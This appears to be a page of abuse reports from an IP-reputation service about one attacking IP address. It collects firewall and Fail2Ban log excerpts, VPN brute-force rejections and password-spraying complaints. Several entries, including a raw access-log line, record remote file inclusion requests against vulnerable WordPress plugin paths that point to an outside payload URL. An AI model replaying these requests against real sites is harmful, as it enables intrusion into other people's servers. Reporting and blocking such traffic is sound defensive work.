๐บ๐ธ
TPI-Abuse
2026-05-20 06:51:37
(2 weeks ago)
(mod_security) mod_security (id:225170) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:225170) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed May 20 02:51:29.520021 2026] [security2:error] [pid 18757:tid 18757] [client 178.20.30.37:25807] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||kennedysplace.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "kennedysplace.com"] [uri "/wp-json/wp/v2/users"] [unique_id "ag1Z8XCZDLbZd9B8NUHozwAAAAo"], referer: https://www.google.com
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ซ๐ท
tilellit.pro
2026-02-28 14:17:19
(3 months ago)
Fail2Ban banned 178.20.30.37 for security violations in jail wp-armour. Log: 2026/02/28 14:17:19 [er ...
show more
Fail2Ban banned 178.20.30.37 for security violations in jail wp-armour. Log: 2026/02/28 14:17:19 [error] FastCGI sent in stderr: "PHP message: [WP_ARMOUR_BAN] IP: 178.20.30.37 | Target: wplogin" , client: 178.20.30.37, server: [REDACTED], request: "POST /wp-login.php HTTP/1.1", upstream: [REDACTED], host: [REDACTED], referrer: "https://comerciogallego.es/wp-login.php"
...
show less
Web Spam
๐ฆ๐บ
MAGIC
2025-06-19 16:03:45
(11 months ago)
VM1 Bad user agents ignoring web crawling rules. Draing bandwidth
DDoS Attack
Bad Web Bot
๐จ๐ฟ
lp
2025-06-01 07:50:17
(1 year ago)
Unauthorized VPN login attempts: 1 attempts were recorded from 178.20.30.37
2025-06-01T09:40:04+02:0 ...
show more
Unauthorized VPN login attempts: 1 attempts were recorded from 178.20.30.37
2025-06-01T09:40:04+02:00 vpn Access-Reject 'ags' station: 178.20.30.37 auth-type: - realm: vse.cz nas: <redacted> called: <redacted> => address-pool: - msg: '<redacted>'
show less
Brute-Force
Web App Attack
๐จ๐ฟ
lp
2025-05-23 21:20:58
(1 year ago)
Unauthorized VPN login attempts: 1 attempts were recorded from 178.20.30.37
2025-05-23T22:13:01+02:0 ...
show more
Unauthorized VPN login attempts: 1 attempts were recorded from 178.20.30.37
2025-05-23T22:13:01+02:00 vpn Access-Reject 'unmechanized' station: 178.20.30.37 auth-type: - realm: vse.cz nas: <redacted> called: <redacted> => address-pool: - msg: '<redacted>'
show less
Brute-Force
Web App Attack
๐ธ๐ช
OnTheEdge
2025-05-18 21:59:42
(1 year ago)
Password spraying. Multiple unauthorized login attempts
Hacking
Web App Attack
๐จ๐ฟ
lp
2025-05-14 09:21:54
(1 year ago)
Unauthorized VPN login attempts: 2 attempts were recorded from 178.20.30.37
2025-05-14T10:41:41+02:0 ...
show more
Unauthorized VPN login attempts: 2 attempts were recorded from 178.20.30.37
2025-05-14T10:41:41+02:00 vpn Access-Reject 'fredric' station: 178.20.30.37 auth-type: - realm: vse.cz nas: <redacted> called: <redacted> => address-pool: - msg: '<redacted>'
2025-05-14T10:49:45+02:00 vpn Access-Reject 'aaron1' station: 178.20.30.37 auth-type: - realm: vse.cz nas: <redacted> called: <redacted> => address-pool: - msg: '<redacted>'
show less
Brute-Force
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-03-28 04:17:06
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Mar 28 00:17:01.738587 2025] [security2:error] [pid 1821320:tid 1821320] [client 178.20.30.37:22231] [client 178.20.30.37] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "11"] [msg "COMODO WAF: Remote File Inclusion Attack||boardinjapan.com|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/all-in-one-seo-pack/classes/aiosp.class.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "boardinjapan.com"] [uri "/wp-content/plugins/all-in-one-seo-pack/classes/aiosp.class.php"] [unique_id "Z-YivUH3k7i6B8dqHk6hdAAAAAk"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
octageeks.com
2025-03-28 04:07:02
(1 year ago)
Wordpress malicious attack:[octascan]
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-03-24 09:52:58
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Mar 24 05:52:51.565989 2025] [security2:error] [pid 3618966:tid 3618966] [client 178.20.30.37:39821] [client 178.20.30.37] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "12"] [msg "COMODO WAF: Remote File Inclusion Attack||beirutbazar.com|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/w3-total-cache/lib/w3/pager.class.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "beirutbazar.com"] [uri "/wp-content/plugins/w3-total-cache/lib/W3/Pager.class.php"] [unique_id "Z-Erc8MFAVYXNu8-UigV9AAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-03-18 19:38:56
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Mar 18 15:38:52.386724 2025] [security2:error] [pid 24640:tid 24650] [client 178.20.30.37:57649] [client 178.20.30.37] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "12"] [msg "COMODO WAF: Remote File Inclusion Attack||artmarialeon.com|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/canto/includes/lib/download.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "artmarialeon.com"] [uri "/wp-content/plugins/canto/includes/lib/download.php"] [unique_id "Z9nLzGMXdXE7vLPGkcSwdgAAAEg"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2025-03-17 20:41:47
(1 year ago)
178.20.30.37 - - [17/Mar/2025:21:41:43 +0100] "GET /wp-content/plugins/all-in-one-seo-pack/classes/a ...
show more
178.20.30.37 - - [17/Mar/2025:21:41:43 +0100] "GET /wp-content/plugins/all-in-one-seo-pack/classes/aiosp.class.php?wp_abspath=http://adguard.digital/payload/index.php? HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
show less
Hacking
๐บ๐ธ
octageeks.com
2025-03-14 04:13:36
(1 year ago)
Wordpress malicious attack:[octa404]
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-03-08 19:13:05
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Mar 08 14:13:01.037193 2025] [security2:error] [pid 14981:tid 14994] [client 178.20.30.37:40513] [client 178.20.30.37] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "12"] [msg "COMODO WAF: Remote File Inclusion Attack||41bravo.com|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/wp-super-cache/js/cache-loader.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41bravo.com"] [uri "/wp-content/plugins/wp-super-cache/js/cache-loader.php"] [unique_id "Z8yWvXIM6hBDlPTPkWXEXQAAAMs"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-02-27 17:16:53
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:211120) triggered by 178.20.30.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Feb 27 12:16:49.207776 2025] [security2:error] [pid 1858089:tid 1858089] [client 178.20.30.37:17641] [client 178.20.30.37] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "12"] [msg "COMODO WAF: Remote File Inclusion Attack||www.ussthresher.com|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/canto/includes/lib/download.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.ussthresher.com"] [uri "/wp-content/plugins/canto/includes/lib/download.php"] [unique_id "Z8CeAatBryNxQRkR7Voa-gAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack